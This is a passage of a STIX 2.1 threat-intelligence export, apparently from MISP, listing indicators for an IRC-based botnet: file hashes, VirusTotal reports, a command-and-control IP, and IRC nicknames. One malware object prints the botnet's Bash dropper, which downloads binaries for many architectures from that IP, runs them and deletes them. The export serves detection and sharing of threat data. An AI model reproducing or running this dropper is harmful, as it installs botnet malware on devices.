|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-dbd0-464c-b6de-462202de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = 'f031d926d80805795c20d1a7b280759d1393e736a85f7fd2e02d2088f2fb0221']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-235c-49fe-8303-4a8e02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-58f0-4fff-810e-472d02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-a4c8-4691-8b09-443902de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '3549fca31abf602a78f645d3406ad075e02c7ea9a6aa9cec243ba6cb58b5e39f']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc41804-31dc-4d16-b61e-4b6502de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:16.000Z",
|
|
|
|
|
"pattern": "[file:hashes.SHA256 = '62997b5ecc8bb785f16803cdd04d2b4209476e457d9a46cbb1f7fae0a6a8108d']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:16Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"sha256\"",
|
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "observed-data",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "observed-data--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T09:03:03.000Z",
|
|
|
|
|
"modified": "2019-04-27T09:03:03.000Z",
|
|
|
|
|
"first_observed": "2019-04-27T09:03:03Z",
|
|
|
|
|
"last_observed": "2019-04-27T09:03:03Z",
|
|
|
|
|
"number_observed": 1,
|
|
|
|
|
"object_refs": [
|
|
|
|
|
"url--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81"
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "url",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "url--5cc41ac7-0aa4-4bff-8f34-4bd402de0b81",
|
|
|
|
|
"value": "https://www.stratosphereips.org/blog/2019/4/12/analysis-of-a-irc-based-botnet"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--332718dd-e3ba-40b1-bb59-06318357f8e2",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:42:22.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:42:22.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = '82062b666f09fc5c0fe4f68d1ea90916' AND file:hashes.SHA1 = 'b35d4b7980d361874e84e76eddbaff83c2c5790f' AND file:hashes.SHA256 = '49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:42:22Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--ec7ab03e-c8dd-4dd2-886e-cf39dada576c",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:20:12.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:20:12.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2018-12-21T07:40:44",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "4bef3161-25cf-4364-bcef-432bc49c6834"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/49fd1cb22e0325c1f9038160da534fc23672e5509e903a94ce5bcddc893eb2c0/analysis/1545378044/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "73e29dd1-c3dd-40bd-91e1-660a20460fe9"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "26/57",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "cbd0000d-8368-430e-85e0-7c2cd4871b09"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--5cc410e3-9a44-4c3a-abb2-498602de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:21:55.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:21:55.000Z",
|
|
|
|
|
"pattern": "[(network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.244.25.235') AND network-traffic:dst_port = '80']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:21:55Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "network"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"ip-port\"",
|
|
|
|
|
"misp:meta-category=\"network\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--5cc4152b-efe8-4b4e-a4ff-4c8c02de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:55:30.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:55:30.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"irc\"",
|
|
|
|
|
"misp:meta-category=\"network\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "nickname",
|
|
|
|
|
"value": "AmpAttacks",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "5cc4152c-470c-4c48-b864-48d302de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "ip-dst",
|
|
|
|
|
"object_relation": "ip",
|
|
|
|
|
"value": "185.244.25.235",
|
|
|
|
|
"category": "Network activity",
|
|
|
|
|
"to_ids": true,
|
|
|
|
|
"uuid": "5cc4152c-86c0-4511-bc5f-450902de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "channel",
|
|
|
|
|
"value": "Summit",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "5cc4152c-bd1c-4174-94ba-4c7202de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "port",
|
|
|
|
|
"object_relation": "dst-port",
|
|
|
|
|
"value": "6667",
|
|
|
|
|
"category": "Network activity",
|
|
|
|
|
"uuid": "5cc4152c-6de0-4f8b-8e6f-4d1d02de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "nickname",
|
|
|
|
|
"value": "[x86_64|BWQLXKB]",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "5cc41660-2350-47b7-8703-4df902de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "nickname",
|
|
|
|
|
"value": "[MIPS|WGEQAV]",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "5cc41660-a6c4-4736-a284-4b7902de0b81"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "nickname",
|
|
|
|
|
"value": "[ARM4T|PCVREB]",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "5cc41660-b8d8-4c08-a98b-4c3002de0b81"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "network",
|
|
|
|
|
"x_misp_name": "irc"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "malware",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "malware--5cc417e0-af4c-4df0-974b-4cd102de0b81",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:50:40.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:50:40.000Z",
|
|
|
|
|
"name": "sh",
|
|
|
|
|
"is_family": false,
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "misc"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"implementation_languages": [
|
|
|
|
|
"Bash"
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"script\"",
|
|
|
|
|
"misp:meta-category=\"misc\"",
|
|
|
|
|
"misp:to_ids=\"False\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_script": "#!/bin/bash\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mips; chmod +x mips; ./mips; rm -rf mips\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sh4; chmod +x sh4; ./sh4; rm -rf sh4\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/x86; chmod +x x86; ./x86; rm -rf x86\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv7l; chmod +x armv7l; ./armv7l; rm -rf armv7l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i686; chmod +x i686; ./i686; rm -rf i686\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/i586; chmod +x i586; ./i586; rm -rf i586\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/m68k; chmod +x m68k; ./m68k; rm -rf m68k\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/sparc; chmod +x sparc; ./sparc; rm -rf sparc\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l\r\ncd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.244.25.235/440fp; chmod +x 440fp; ./440fp; rm -rf 440fp",
|
|
|
|
|
"x_misp_state": "Malicious"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--6264284d-c9d5-4c12-8ba3-0f3c4ac9231a",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:32.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:32.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = '1cc9232302cb7569dc6dcd76fe5d7c48' AND file:hashes.SHA1 = '3c24b5150afbcfc8b5b98740329e279c778acfec' AND file:hashes.SHA256 = '284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:32Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--c584310f-cfa6-4ca0-b283-88853eff679e",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:32.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:32.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-04-07T05:10:51",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "c979bfbb-fa6b-435e-a994-2212c5b430ee"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/284bde3fc80d81eb2cf644770df64c59cc444f283bd4ab96f64431fef735879a/analysis/1554613851/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "4db99dd0-83ff-456e-9796-816f83b2c265"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "35/55",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "dcffe0ba-339e-4ab0-b00d-729db80d1bf5"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--a6383e65-36cc-4e3a-8d2e-439afdb5a58b",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = 'e49d17afc76617a6b2a445ef21342454' AND file:hashes.SHA1 = '5d223085ca23494fd18622e6bc6d81b6f8eaa8a8' AND file:hashes.SHA256 = '3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--dc71966f-e4cf-4026-a133-50090fd4b95b",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-04-14T04:40:19",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "4c0b0672-508b-41f5-8ff0-6b13ee76b5c5"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/3efdd1461af3cf4039bd7a3ababcf71c5df08a1c232a36287d9ae1f0bd7509cc/analysis/1555216819/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "1c60fb0a-aa1f-4dbc-a9ab-dc741863af4a"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "37/57",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "c5d88b4d-d908-4ecd-bcb1-bccf7e878a70"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--7c1420e2-b2c6-455a-ae2d-675b32ffa908",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = '30097dc12f07b9d44fd4bb32ea30cd4e' AND file:hashes.SHA1 = '4f2350b20810ad45d40036c12d23239df1e3eaad' AND file:hashes.SHA256 = '32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--67696428-f0ea-4068-b00a-f669ee50ae03",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-04-06T09:09:47",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "16887f29-8d0c-46bd-a5ba-43b819d1b5f3"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
"value": "https://www.virustotal.com/file/32776a1a3eb8914855b57972c94750e0bb1dedd3ed161fdb53098cdfcee74ce3/analysis/1554541787/",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "08a55fac-9627-496d-b5f1-d2fff1469956"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "text",
|
|
|
|
|
"object_relation": "detection-ratio",
|
|
|
|
|
"value": "35/56",
|
|
|
|
|
"category": "Payload delivery",
|
|
|
|
|
"uuid": "1ad4c142-b928-4b40-954b-ed89873761fa"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"x_misp_meta_category": "misc",
|
|
|
|
|
"x_misp_name": "virustotal-report"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "indicator",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "indicator--45275180-143d-4606-9cd3-6bc35646d412",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"pattern": "[file:hashes.MD5 = '5a56f0b53d7639c3775b41de95b4902e' AND file:hashes.SHA1 = '18f0a1a2f448d2a5824566a080b32f5d5f291075' AND file:hashes.SHA256 = '34fa4705a10ca0d940762f5f594bbf93fe79f1df2bf4a1fb69fe9b00ff79b2fe']",
|
|
|
|
|
"pattern_type": "stix",
|
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
|
"valid_from": "2019-04-27T08:51:33Z",
|
|
|
|
|
"kill_chain_phases": [
|
|
|
|
|
{
|
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
|
"phase_name": "file"
|
|
|
|
|
}
|
|
|
|
|
],
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"file\"",
|
|
|
|
|
"misp:meta-category=\"file\"",
|
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
|
]
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "x-misp-object",
|
|
|
|
|
"spec_version": "2.1",
|
|
|
|
|
"id": "x-misp-object--5a3041a4-6ba6-4ce5-8d08-59693a3c3703",
|
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
|
"created": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"modified": "2019-04-27T08:51:33.000Z",
|
|
|
|
|
"labels": [
|
|
|
|
|
"misp:name=\"virustotal-report\"",
|
|
|
|
|
"misp:meta-category=\"misc\""
|
|
|
|
|
],
|
|
|
|
|
"x_misp_attributes": [
|
|
|
|
|
{
|
|
|
|
|
"type": "datetime",
|
|
|
|
|
"object_relation": "last-submission",
|
|
|
|
|
"value": "2019-04-14T04:38:58",
|
|
|
|
|
"category": "Other",
|
|
|
|
|
"uuid": "28219f45-de8f-443f-95ea-f953b32ab42c"
|
|
|
|
|
},
|
|
|
|
|
{
|
|
|
|
|
"type": "link",
|
|
|
|
|
"object_relation": "permalink",
|
|
|
|
|
